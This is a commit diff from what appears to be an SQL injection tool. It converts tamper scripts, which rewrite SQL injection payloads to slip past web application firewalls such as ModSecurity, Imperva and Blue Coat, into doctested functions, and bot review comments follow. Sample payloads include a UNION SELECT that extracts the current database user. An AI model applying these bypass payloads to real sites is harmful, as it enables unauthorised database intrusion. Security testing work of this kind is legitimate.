	Another update for an Issue #352 and couple of fixes
This commit is contained in:
		
							parent
							
								
									b35122a42c
								
							
						
					
					
						commit
						4cb378ce3e
					
				|  | @ -736,7 +736,7 @@ def singleTimeLogMessage(message, level=logging.INFO, flag=None): | ||||||
|     if flag is None: |     if flag is None: | ||||||
|         flag = hash(message) |         flag = hash(message) | ||||||
| 
 | 
 | ||||||
|     if flag not in kb.singleLogFlags: |     if not conf.smokeTest and flag not in kb.singleLogFlags: | ||||||
|         kb.singleLogFlags.add(flag) |         kb.singleLogFlags.add(flag) | ||||||
|         logger.log(level, message) |         logger.log(level, message) | ||||||
| 
 | 
 | ||||||
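Review bot: The new condition `if not conf.smokeTest and flag not in kb.singleLogFlags:` silences every single-time message while a smoke test runs, and nothing in the hunk records why, so a later reader may mistake it for a dedup bug. If the purpose is to keep the smoke-test (doctest) output free of the one-off notices the tamper scripts emit, a why-comment makes that explicit: `# smoke test exercises many scripts at once; keep their one-off notices out of its output`. Note that in that mode the flag is also never added to `kb.singleLogFlags`, so the message is still eligible to be logged once `conf.smokeTest` is cleared — presumably harmless, but worth confirming that it is intended. The enclosing `singleTimeLogMessage` starts outside the hunk.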
|  |  | ||||||
|  | @ -41,8 +41,9 @@ failedTraceBack = None | ||||||
| 
 | 
 | ||||||
| def smokeTest(): | def smokeTest(): | ||||||
|     """ |     """ | ||||||
|     This will run the basic smoke testing of a program |     Runs the basic smoke testing of a program | ||||||
|     """ |     """ | ||||||
|  | 
 | ||||||
|     retVal = True |     retVal = True | ||||||
|     count, length = 0, 0 |     count, length = 0, 0 | ||||||
| 
 | 
 | ||||||
|  | @ -106,8 +107,9 @@ def adjustValueType(tagName, value): | ||||||
| 
 | 
 | ||||||
| def liveTest(): | def liveTest(): | ||||||
|     """ |     """ | ||||||
|     This will run the test of a program against the live testing environment |     Runs the test of a program against the live testing environment | ||||||
|     """ |     """ | ||||||
|  | 
 | ||||||
|     global failedItem |     global failedItem | ||||||
|     global failedParseOn |     global failedParseOn | ||||||
|     global failedTraceBack |     global failedTraceBack | ||||||
|  |  | ||||||
|  | @ -16,15 +16,14 @@ def tamper(payload, **kwargs): | ||||||
|     """ |     """ | ||||||
|     Replaces apostrophe character with its UTF-8 full width counterpart |     Replaces apostrophe character with its UTF-8 full width counterpart | ||||||
| 
 | 
 | ||||||
|     Example: |  | ||||||
|         * Input: AND '1'='1' |  | ||||||
|         * Output: AND %EF%BC%871%EF%BC%87=%EF%BC%871%EF%BC%87 |  | ||||||
| 
 |  | ||||||
|     References: |     References: | ||||||
|         * http://www.utf8-chartable.de/unicode-utf8-table.pl?start=65280&number=128 |         * http://www.utf8-chartable.de/unicode-utf8-table.pl?start=65280&number=128 | ||||||
|         * http://lukasz.pilorz.net/testy/unicode_conversion/ |         * http://lukasz.pilorz.net/testy/unicode_conversion/ | ||||||
|         * http://sla.ckers.org/forum/read.php?13,11562,11850 |         * http://sla.ckers.org/forum/read.php?13,11562,11850 | ||||||
|         * http://lukasz.pilorz.net/testy/full_width_utf/index.phps |         * http://lukasz.pilorz.net/testy/full_width_utf/index.phps | ||||||
|  | 
 | ||||||
|  |     >>> tamper("1 AND '1'='1") | ||||||
|  |     '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871' | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     return payload.replace('\'', "%EF%BC%87") if payload else payload |     return payload.replace('\'', "%EF%BC%87") if payload else payload | ||||||
|  |  | ||||||
|  | @ -16,9 +16,8 @@ def tamper(payload, **kwargs): | ||||||
|     """ |     """ | ||||||
|     Replaces apostrophe character with its illegal double unicode counterpart |     Replaces apostrophe character with its illegal double unicode counterpart | ||||||
| 
 | 
 | ||||||
|     Example: |     >>> tamper("1 AND '1'='1") | ||||||
|         * Input: AND '1'='1' |     '1 AND %00%271%00%27=%00%271' | ||||||
|         * Output: AND %00%271%00%27=%00%271%00%27 |  | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     return payload.replace('\'', "%00%27") if payload else payload |     return payload.replace('\'', "%00%27") if payload else payload | ||||||
|  |  | ||||||
|  | @ -16,10 +16,6 @@ def tamper(payload, **kwargs): | ||||||
|     """ |     """ | ||||||
|     Appends encoded NULL byte character at the end of payload |     Appends encoded NULL byte character at the end of payload | ||||||
| 
 | 
 | ||||||
|     Example: |  | ||||||
|         * Input: AND 1=1 |  | ||||||
|         * Output: AND 1=1%00 |  | ||||||
| 
 |  | ||||||
|     Requirement: |     Requirement: | ||||||
|         * Microsoft Access |         * Microsoft Access | ||||||
| 
 | 
 | ||||||
|  | @ -29,6 +25,9 @@ def tamper(payload, **kwargs): | ||||||
|           also possible |           also possible | ||||||
| 
 | 
 | ||||||
|     Reference: http://projects.webappsec.org/w/page/13246949/Null-Byte-Injection |     Reference: http://projects.webappsec.org/w/page/13246949/Null-Byte-Injection | ||||||
|  | 
 | ||||||
|  |     >>> tamper('1 AND 1=1') | ||||||
|  |     '1 AND 1=1%00' | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     return "%s%%00" % payload if payload else payload |     return "%s%%00" % payload if payload else payload | ||||||
|  |  | ||||||
|  | @ -18,9 +18,8 @@ def tamper(payload, **kwargs): | ||||||
|     """ |     """ | ||||||
|     Base64 all characters in a given payload |     Base64 all characters in a given payload | ||||||
| 
 | 
 | ||||||
|     Example: |     >>> tamper("1' AND SLEEP(5)#") | ||||||
|         * Input: 1' AND SLEEP(5)# |     'MScgQU5EIFNMRUVQKDUpIw==' | ||||||
|         * Output: MScgQU5EIFNMRUVQKDUpIw== |  | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     return base64.b64encode(payload) if payload else payload |     return base64.b64encode(payload) if payload else payload | ||||||
|  |  | ||||||
|  | @ -18,10 +18,6 @@ def tamper(payload, **kwargs): | ||||||
|     """ |     """ | ||||||
|     Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' |     Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' | ||||||
| 
 | 
 | ||||||
|     Example: |  | ||||||
|         * Input: 'A > B' |  | ||||||
|         * Output: 'A NOT BETWEEN 0 AND B' |  | ||||||
| 
 |  | ||||||
|     Tested against: |     Tested against: | ||||||
|         * Microsoft SQL Server 2005 |         * Microsoft SQL Server 2005 | ||||||
|         * MySQL 4, 5.0 and 5.5 |         * MySQL 4, 5.0 and 5.5 | ||||||
|  | @ -33,6 +29,9 @@ def tamper(payload, **kwargs): | ||||||
|           filter the greater than character |           filter the greater than character | ||||||
|         * The BETWEEN clause is SQL standard. Hence, this tamper script |         * The BETWEEN clause is SQL standard. Hence, this tamper script | ||||||
|           should work against all (?) databases |           should work against all (?) databases | ||||||
|  | 
 | ||||||
|  |     >>> tamper('1 AND A > B--') | ||||||
|  |     '1 AND A NOT BETWEEN 0 AND B--' | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     retVal = payload |     retVal = payload | ||||||
|  |  | ||||||
|  | @ -19,10 +19,6 @@ def tamper(payload, **kwargs): | ||||||
|     Replaces space character after SQL statement with a valid random blank character. |     Replaces space character after SQL statement with a valid random blank character. | ||||||
|     Afterwards replace character = with LIKE operator |     Afterwards replace character = with LIKE operator | ||||||
| 
 | 
 | ||||||
|     Example: |  | ||||||
|         * Input: SELECT id FROM users where id = 1 |  | ||||||
|         * Output: SELECT%09id FROM users where id LIKE 1 |  | ||||||
| 
 |  | ||||||
|     Requirement: |     Requirement: | ||||||
|         * Blue Coat SGOS with WAF activated as documented in |         * Blue Coat SGOS with WAF activated as documented in | ||||||
|         https://kb.bluecoat.com/index?page=content&id=FAQ2147 |         https://kb.bluecoat.com/index?page=content&id=FAQ2147 | ||||||
|  | @ -32,12 +28,15 @@ def tamper(payload, **kwargs): | ||||||
| 
 | 
 | ||||||
|     Notes: |     Notes: | ||||||
|         * Useful to bypass Blue Coat's recommended WAF rule configuration |         * Useful to bypass Blue Coat's recommended WAF rule configuration | ||||||
|  | 
 | ||||||
|  |     >>> tamper('SELECT id FROM users where id = 1') | ||||||
|  |     'SELECT%09id FROM users where id LIKE 1' | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     retVal = payload |     retVal = payload | ||||||
| 
 | 
 | ||||||
|     if payload: |     if payload: | ||||||
|         retVal = re.sub(r"(?i)(SELECT|UPDATE|INSERT|DELETE)\s+", r"\g<1>\t", payload) |         retVal = re.sub(r"(?i)(SELECT|UPDATE|INSERT|DELETE)\s+", r"\g<1>%09", payload) | ||||||
|         retVal = re.sub(r"\s*=\s*", " LIKE ", retVal) |         retVal = re.sub(r"\s*=\s*", " LIKE ", retVal) | ||||||
| 
 | 
 | ||||||
|     return retVal |     return retVal | ||||||
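Review bot: The `=`-to-LIKE substitution `retVal = re.sub(r"\s*=\s*", " LIKE ", retVal)` on the new side is unanchored, so it also rewrites the `=` inside `>=`, `<=` and `!=` (`id>=1` becomes `id> LIKE 1`), which corrupts the query instead of re-expressing it; the commit only touches the `%09` line above it. If such operators can occur in the payload, a negative lookbehind keeps them intact: `retVal = re.sub(r"(?<![<>!])\s*=\s*", " LIKE ", retVal)`, which still yields the new doctest's `'SELECT%09id FROM users where id LIKE 1'`. The switch from a raw `\t` to the literal `%09` also leaves the keyword separator pre-encoded while the rest of the payload stays raw; presumably that is deliberate (confirm against the request-building path), and a one-line comment such as `# emit the tab already url-encoded so it is not normalised back to a space downstream` would save the next reader the guess.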
|  |  | ||||||
|  | @ -19,14 +19,13 @@ def tamper(payload, **kwargs): | ||||||
|     Double url-encodes all characters in a given payload (not processing |     Double url-encodes all characters in a given payload (not processing | ||||||
|     already encoded) |     already encoded) | ||||||
| 
 | 
 | ||||||
|     Example: |  | ||||||
|         * Input: SELECT FIELD FROM%20TABLE |  | ||||||
|         * Output: %2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545 |  | ||||||
| 
 |  | ||||||
|     Notes: |     Notes: | ||||||
|         * Useful to bypass some weak web application firewalls that do not |         * Useful to bypass some weak web application firewalls that do not | ||||||
|           double url-decode the request before processing it through their |           double url-decode the request before processing it through their | ||||||
|           ruleset |           ruleset | ||||||
|  | 
 | ||||||
|  |     >>> tamper('SELECT FIELD FROM%20TABLE') | ||||||
|  |     '%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545' | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     retVal = payload |     retVal = payload | ||||||
|  | @ -37,7 +36,7 @@ def tamper(payload, **kwargs): | ||||||
| 
 | 
 | ||||||
|         while i < len(payload): |         while i < len(payload): | ||||||
|             if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits: |             if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits: | ||||||
|                 retVal += payload[i:i + 3] |                 retVal += '%%25%s' % payload[i + 1:i + 3] | ||||||
|                 i += 3 |                 i += 3 | ||||||
|             else: |             else: | ||||||
|                 retVal += '%%25%.2X' % ord(payload[i]) |                 retVal += '%%25%.2X' % ord(payload[i]) | ||||||
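Review bot: The docstring's "(not processing already encoded)" on the new side no longer matches the code: the changed branch `retVal += '%%25%s' % payload[i + 1:i + 3]` now does process `%XX` sequences, escaping their `%` once (`%20` -> `%2520`, as the new doctest shows) so the whole result decodes to a uniformly single-encoded payload. Suggest rewording the parenthetical to `(already url-encoded sequences get their leading '%' encoded once, e.g. '%20' -> '%2520', rather than being encoded twice)`. One side effect worth a comment: the copied hex digits keep their original case while fresh encodings use `%.2X`, so mixed output like `%254c` beside `%254C` is possible; `payload[i + 1:i + 3].upper()` would normalise it if a downstream comparison is case-sensitive. The enclosing function starts and ends outside the hunk.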
|  |  | ||||||
|  | @ -19,10 +19,6 @@ def tamper(payload, **kwargs): | ||||||
|     Url-encodes all characters in a given payload (not processing already |     Url-encodes all characters in a given payload (not processing already | ||||||
|     encoded) |     encoded) | ||||||
| 
 | 
 | ||||||
|     Example: |  | ||||||
|         * Input: SELECT FIELD FROM%20TABLE |  | ||||||
|         * Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45 |  | ||||||
| 
 |  | ||||||
|     Tested against: |     Tested against: | ||||||
|         * Microsoft SQL Server 2005 |         * Microsoft SQL Server 2005 | ||||||
|         * MySQL 4, 5.0 and 5.5 |         * MySQL 4, 5.0 and 5.5 | ||||||
|  | @ -34,6 +30,9 @@ def tamper(payload, **kwargs): | ||||||
|           url-decode the request before processing it through their ruleset |           url-decode the request before processing it through their ruleset | ||||||
|         * The web server will anyway pass the url-decoded version behind, |         * The web server will anyway pass the url-decoded version behind, | ||||||
|           hence it should work against any DBMS |           hence it should work against any DBMS | ||||||
|  | 
 | ||||||
|  |     >>> tamper('SELECT FIELD FROM%20TABLE') | ||||||
|  |     '%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45' | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     retVal = payload |     retVal = payload | ||||||
|  |  | ||||||
|  | @ -21,10 +21,6 @@ def tamper(payload, **kwargs): | ||||||
|     Unicode-url-encodes non-encoded characters in a given payload (not |     Unicode-url-encodes non-encoded characters in a given payload (not | ||||||
|     processing already encoded) |     processing already encoded) | ||||||
| 
 | 
 | ||||||
|     Example: |  | ||||||
|         * Input: SELECT FIELD%20FROM TABLE |  | ||||||
|         * Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045' |  | ||||||
| 
 |  | ||||||
|     Requirement: |     Requirement: | ||||||
|         * ASP |         * ASP | ||||||
|         * ASP.NET |         * ASP.NET | ||||||
|  | @ -39,6 +35,9 @@ def tamper(payload, **kwargs): | ||||||
|         * Useful to bypass weak web application firewalls that do not |         * Useful to bypass weak web application firewalls that do not | ||||||
|           unicode url-decode the request before processing it through their |           unicode url-decode the request before processing it through their | ||||||
|           ruleset |           ruleset | ||||||
|  | 
 | ||||||
|  |     >>> tamper('SELECT FIELD%20FROM TABLE') | ||||||
|  |     '%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045' | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     retVal = payload |     retVal = payload | ||||||
|  |  | ||||||
|  | @ -21,10 +21,6 @@ def tamper(payload, **kwargs): | ||||||
|     """ |     """ | ||||||
|     Replaces all occurances of operator equal ('=') with operator 'LIKE' |     Replaces all occurances of operator equal ('=') with operator 'LIKE' | ||||||
| 
 | 
 | ||||||
|     Example: |  | ||||||
|         * Input: SELECT * FROM users WHERE id=1 |  | ||||||
|         * Output: SELECT * FROM users WHERE id LIKE 1 |  | ||||||
| 
 |  | ||||||
|     Tested against: |     Tested against: | ||||||
|         * Microsoft SQL Server 2005 |         * Microsoft SQL Server 2005 | ||||||
|         * MySQL 4, 5.0 and 5.5 |         * MySQL 4, 5.0 and 5.5 | ||||||
|  | @ -34,6 +30,9 @@ def tamper(payload, **kwargs): | ||||||
|           filter the equal character ('=') |           filter the equal character ('=') | ||||||
|         * The LIKE operator is SQL standard. Hence, this tamper script |         * The LIKE operator is SQL standard. Hence, this tamper script | ||||||
|           should work against all (?) databases |           should work against all (?) databases | ||||||
|  | 
 | ||||||
|  |     >>> tamper('SELECT * FROM users WHERE id=1') | ||||||
|  |     'SELECT * FROM users WHERE id LIKE 1' | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     def process(match): |     def process(match): | ||||||
|  |  | ||||||
|  | @ -18,10 +18,6 @@ def tamper(payload, **kwargs): | ||||||
|     """ |     """ | ||||||
|     Replaces greater than operator ('>') with 'GREATEST' counterpart |     Replaces greater than operator ('>') with 'GREATEST' counterpart | ||||||
| 
 | 
 | ||||||
|     Example: |  | ||||||
|         * Input: 'A > B' |  | ||||||
|         * Output: 'GREATEST(A, B + 1) = A' |  | ||||||
| 
 |  | ||||||
|     Tested against: |     Tested against: | ||||||
|         * MySQL 4, 5.0 and 5.5 |         * MySQL 4, 5.0 and 5.5 | ||||||
|         * Oracle 10g |         * Oracle 10g | ||||||
|  | @ -32,6 +28,9 @@ def tamper(payload, **kwargs): | ||||||
|           filter the greater than character |           filter the greater than character | ||||||
|         * The GREATEST clause is a widespread SQL command. Hence, this |         * The GREATEST clause is a widespread SQL command. Hence, this | ||||||
|           tamper script should work against majority of databases |           tamper script should work against majority of databases | ||||||
|  | 
 | ||||||
|  |     >>> tamper('1 AND A > B') | ||||||
|  |     '1 AND GREATEST(A,B+1)=A' | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     retVal = payload |     retVal = payload | ||||||
|  |  | ||||||
|  | @ -23,10 +23,6 @@ def tamper(payload, **kwargs): | ||||||
|     """ |     """ | ||||||
|     Adds versioned MySQL comment before each keyword |     Adds versioned MySQL comment before each keyword | ||||||
| 
 | 
 | ||||||
|     Example: |  | ||||||
|         * Input: value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa |  | ||||||
|         * Output: value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND 'QDWa'='QDWa |  | ||||||
| 
 |  | ||||||
|     Requirement: |     Requirement: | ||||||
|         * MySQL < 5.1 |         * MySQL < 5.1 | ||||||
| 
 | 
 | ||||||
|  | @ -38,6 +34,9 @@ def tamper(payload, **kwargs): | ||||||
|           back-end database management system is MySQL |           back-end database management system is MySQL | ||||||
|         * Used during the ModSecurity SQL injection challenge, |         * Used during the ModSecurity SQL injection challenge, | ||||||
|           http://modsecurity.org/demo/challenge.html |           http://modsecurity.org/demo/challenge.html | ||||||
|  | 
 | ||||||
|  |     >>> tamper("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa") | ||||||
|  |     "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa" | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     def process(match): |     def process(match): | ||||||
|  |  | ||||||
|  | @ -16,10 +16,6 @@ def tamper(payload, **kwargs): | ||||||
|     """ |     """ | ||||||
|     Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)' |     Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)' | ||||||
| 
 | 
 | ||||||
|     Example: |  | ||||||
|         * Input: IFNULL(1, 2) |  | ||||||
|         * Output: IF(ISNULL(1), 2, 1) |  | ||||||
| 
 |  | ||||||
|     Requirement: |     Requirement: | ||||||
|         * MySQL |         * MySQL | ||||||
|         * SQLite (possibly) |         * SQLite (possibly) | ||||||
|  | @ -31,6 +27,9 @@ def tamper(payload, **kwargs): | ||||||
|     Notes: |     Notes: | ||||||
|         * Useful to bypass very weak and bespoke web application firewalls |         * Useful to bypass very weak and bespoke web application firewalls | ||||||
|           that filter the IFNULL() function |           that filter the IFNULL() function | ||||||
|  | 
 | ||||||
|  |     >>> tamper('IFNULL(1, 2)') | ||||||
|  |     'IF(ISNULL(1),2,1)' | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     if payload and payload.find("IFNULL") > -1: |     if payload and payload.find("IFNULL") > -1: | ||||||
|  | @ -55,7 +54,7 @@ def tamper(payload, **kwargs): | ||||||
| 
 | 
 | ||||||
|             if comma and end: |             if comma and end: | ||||||
|                 _ = payload[index + len("IFNULL("):comma] |                 _ = payload[index + len("IFNULL("):comma] | ||||||
|                 __ = payload[comma + 1:end] |                 __ = payload[comma + 1:end].lstrip() | ||||||
|                 newVal = "IF(ISNULL(%s),%s,%s)" % (_, __, _) |                 newVal = "IF(ISNULL(%s),%s,%s)" % (_, __, _) | ||||||
|                 payload = payload[:index] + newVal + payload[end + 1:] |                 payload = payload[:index] + newVal + payload[end + 1:] | ||||||
|             else: |             else: | ||||||
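Review bot: The added `.lstrip()` only trims leading whitespace of the second IFNULL argument; the first argument `_ = payload[index + len("IFNULL("):comma]` is left untouched and trailing whitespace before the closing parenthesis survives too, so `IFNULL( 1, 2 )` becomes `IF(ISNULL( 1),2 ,1)`. Using `.strip()` on both slices gives the compact form the new doctest documents regardless of the input spacing: `_ = payload[index + len("IFNULL("):comma].strip()` and `__ = payload[comma + 1:end].strip()`. Whitespace around a SQL argument is insignificant, so this does not alter the meaning of the rewritten expression. The enclosing loop and function start and end outside the hunk.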
|  |  | ||||||
|  | @ -17,10 +17,6 @@ def tamper(payload, **kwargs): | ||||||
|     """ |     """ | ||||||
|     Embraces complete query with versioned comment |     Embraces complete query with versioned comment | ||||||
| 
 | 
 | ||||||
|     Example: |  | ||||||
|         * Input: 1 AND 2>1-- |  | ||||||
|         * Output: 1 /*!30000AND 2>1*/-- |  | ||||||
| 
 |  | ||||||
|     Requirement: |     Requirement: | ||||||
|         * MySQL |         * MySQL | ||||||
| 
 | 
 | ||||||
|  | @ -29,6 +25,11 @@ def tamper(payload, **kwargs): | ||||||
| 
 | 
 | ||||||
|     Notes: |     Notes: | ||||||
|         * Useful to bypass ModSecurity WAF/IDS |         * Useful to bypass ModSecurity WAF/IDS | ||||||
|  | 
 | ||||||
|  |     >>> import random | ||||||
|  |     >>> random.seed(0) | ||||||
|  |     >>> tamper('1 AND 2>1--') | ||||||
|  |     '1 /*!30874AND 2>1*/--' | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     retVal = payload |     retVal = payload | ||||||
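Review bot: The doctest `random.seed(0)` followed by `'1 /*!30874AND 2>1*/--'` pins the output of the interpreter's random number generator rather than the behaviour of this script: the sequence a seed produces is an implementation detail (the Python 3.2 changelog notes that `randrange()`/`randint()` results changed), so the smoke test will fail on another interpreter with no change to the tamper code. The same applies to the seeded doctests added later in this commit (multiple spaces, keyword replacement, random case, random comments, space-to-dash, space-to-hash). A sturdier doctest asserts an invariant instead, e.g. `>>> tamper('1 AND 2>1--').endswith('AND 2>1*/--')` giving `True`, leaving exact seeded output to the test harness if it is still wanted. Separately, this docstring and the random-case one do `>>> import random` while the others rely on the module's own import being in the doctest globals — one convention would be clearer. The rest of the function is outside the hunk.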
|  |  | ||||||
|  | @ -16,10 +16,6 @@ def tamper(payload, **kwargs): | ||||||
|     """ |     """ | ||||||
|     Embraces complete query with zero-versioned comment |     Embraces complete query with zero-versioned comment | ||||||
| 
 | 
 | ||||||
|     Example: |  | ||||||
|         * Input: 1 AND 2>1-- |  | ||||||
|         * Output: 1 /*!00000AND 2>1*/-- |  | ||||||
| 
 |  | ||||||
|     Requirement: |     Requirement: | ||||||
|         * MySQL |         * MySQL | ||||||
| 
 | 
 | ||||||
|  | @ -28,6 +24,9 @@ def tamper(payload, **kwargs): | ||||||
| 
 | 
 | ||||||
|     Notes: |     Notes: | ||||||
|         * Useful to bypass ModSecurity WAF/IDS |         * Useful to bypass ModSecurity WAF/IDS | ||||||
|  | 
 | ||||||
|  |     >>> tamper('1 AND 2>1--') | ||||||
|  |     '1 /*!00000AND 2>1*/--' | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     retVal = payload |     retVal = payload | ||||||
|  |  | ||||||
|  | @ -20,15 +20,15 @@ def tamper(payload, **kwargs): | ||||||
|     """ |     """ | ||||||
|     Adds multiple spaces around SQL keywords |     Adds multiple spaces around SQL keywords | ||||||
| 
 | 
 | ||||||
|     Example: |  | ||||||
|         * Input: UNION SELECT |  | ||||||
|         * Output:  UNION   SELECT |  | ||||||
| 
 |  | ||||||
|     Notes: |     Notes: | ||||||
|         * Useful to bypass very weak and bespoke web application firewalls |         * Useful to bypass very weak and bespoke web application firewalls | ||||||
|           that has poorly written permissive regular expressions |           that has poorly written permissive regular expressions | ||||||
| 
 | 
 | ||||||
|     Reference: https://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt |     Reference: https://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt | ||||||
|  | 
 | ||||||
|  |     >>> random.seed(0) | ||||||
|  |     >>> tamper('1 UNION SELECT foobar') | ||||||
|  |     '1    UNION     SELECT   foobar' | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     retVal = payload |     retVal = payload | ||||||
|  |  | ||||||
|  | @ -18,12 +18,12 @@ def tamper(payload, **kwargs): | ||||||
|     Replaces predefined SQL keywords with representations |     Replaces predefined SQL keywords with representations | ||||||
|     suitable for replacement (e.g. .replace("SELECT", "")) filters |     suitable for replacement (e.g. .replace("SELECT", "")) filters | ||||||
| 
 | 
 | ||||||
|     Example: |  | ||||||
|         * Input: 1 UNION SELECT 2-- |  | ||||||
|         * Output: 1 UNUNIONION SELSELECTECT 2-- |  | ||||||
| 
 |  | ||||||
|     Notes: |     Notes: | ||||||
|         * Useful to bypass very weak custom filters |         * Useful to bypass very weak custom filters | ||||||
|  | 
 | ||||||
|  |     >>> random.seed(0) | ||||||
|  |     >>> tamper('1 UNION SELECT 2--') | ||||||
|  |     '1 UNIOUNIONN SELESELECTCT 2--' | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     keywords = ("UNION", "SELECT", "INSERT", "UPDATE", "FROM", "WHERE") |     keywords = ("UNION", "SELECT", "INSERT", "UPDATE", "FROM", "WHERE") | ||||||
|  |  | ||||||
|  | @ -20,10 +20,6 @@ def tamper(payload, **kwargs): | ||||||
|     """ |     """ | ||||||
|     Adds a percentage sign ('%') infront of each character |     Adds a percentage sign ('%') infront of each character | ||||||
| 
 | 
 | ||||||
|     Example: |  | ||||||
|         * Input: SELECT FIELD FROM TABLE |  | ||||||
|         * Output: %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E |  | ||||||
| 
 |  | ||||||
|     Requirement: |     Requirement: | ||||||
|         * ASP |         * ASP | ||||||
| 
 | 
 | ||||||
|  | @ -34,6 +30,9 @@ def tamper(payload, **kwargs): | ||||||
| 
 | 
 | ||||||
|     Notes: |     Notes: | ||||||
|         * Useful to bypass weak and bespoke web application firewalls |         * Useful to bypass weak and bespoke web application firewalls | ||||||
|  | 
 | ||||||
|  |     >>> tamper('SELECT FIELD FROM TABLE') | ||||||
|  |     '%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E' | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     if payload: |     if payload: | ||||||
|  |  | ||||||
|  | @ -20,10 +20,6 @@ def tamper(payload, **kwargs): | ||||||
|     """ |     """ | ||||||
|     Replaces each keyword character with random case value |     Replaces each keyword character with random case value | ||||||
| 
 | 
 | ||||||
|     Example: |  | ||||||
|         * Input: INSERT |  | ||||||
|         * Output: InsERt |  | ||||||
| 
 |  | ||||||
|     Tested against: |     Tested against: | ||||||
|         * Microsoft SQL Server 2005 |         * Microsoft SQL Server 2005 | ||||||
|         * MySQL 4, 5.0 and 5.5 |         * MySQL 4, 5.0 and 5.5 | ||||||
|  | @ -34,6 +30,11 @@ def tamper(payload, **kwargs): | ||||||
|         * Useful to bypass very weak and bespoke web application firewalls |         * Useful to bypass very weak and bespoke web application firewalls | ||||||
|           that has poorly written permissive regular expressions |           that has poorly written permissive regular expressions | ||||||
|         * This tamper script should work against all (?) databases |         * This tamper script should work against all (?) databases | ||||||
|  | 
 | ||||||
|  |     >>> import random | ||||||
|  |     >>> random.seed(0) | ||||||
|  |     >>> tamper('INSERT') | ||||||
|  |     'INseRt' | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     retVal = payload |     retVal = payload | ||||||
|  |  | ||||||
|  | @ -16,7 +16,11 @@ __priority__ = PRIORITY.LOW | ||||||
| def tamper(payload, **kwargs): | def tamper(payload, **kwargs): | ||||||
|     """ |     """ | ||||||
|     Add random comments to SQL keywords |     Add random comments to SQL keywords | ||||||
|     Example: 'INSERT' becomes 'IN/**/S/**/ERT' | 
 | ||||||
|  |     >>> import random | ||||||
|  |     >>> random.seed(0) | ||||||
|  |     >>> tamper('INSERT') | ||||||
|  |     'I/**/N/**/SERT' | ||||||
|     """ |     """ | ||||||
| 
 | 
 | ||||||
|     retVal = payload |     retVal = payload | ||||||
|  |  | ||||||
|  | @ -16,13 +16,12 @@ def tamper(payload, **kwargs): | ||||||
|     """ |     """ | ||||||
|     Appends special crafted string |     Appends special crafted string | ||||||
| 
 | 
 | ||||||
|     Example: |  | ||||||
|         * Input: AND 1=1 |  | ||||||
|         * Output: AND 1=1 and '0having'='0having' |  | ||||||
| 
 |  | ||||||
|     Notes: |     Notes: | ||||||
|         * Useful for bypassing Imperva SecureSphere WAF |         * Useful for bypassing Imperva SecureSphere WAF | ||||||
|         * Reference: http://seclists.org/fulldisclosure/2011/May/163 |         * Reference: http://seclists.org/fulldisclosure/2011/May/163 | ||||||
|  | 
 | ||||||
|  |     >>> tamper('1 AND 1=1') | ||||||
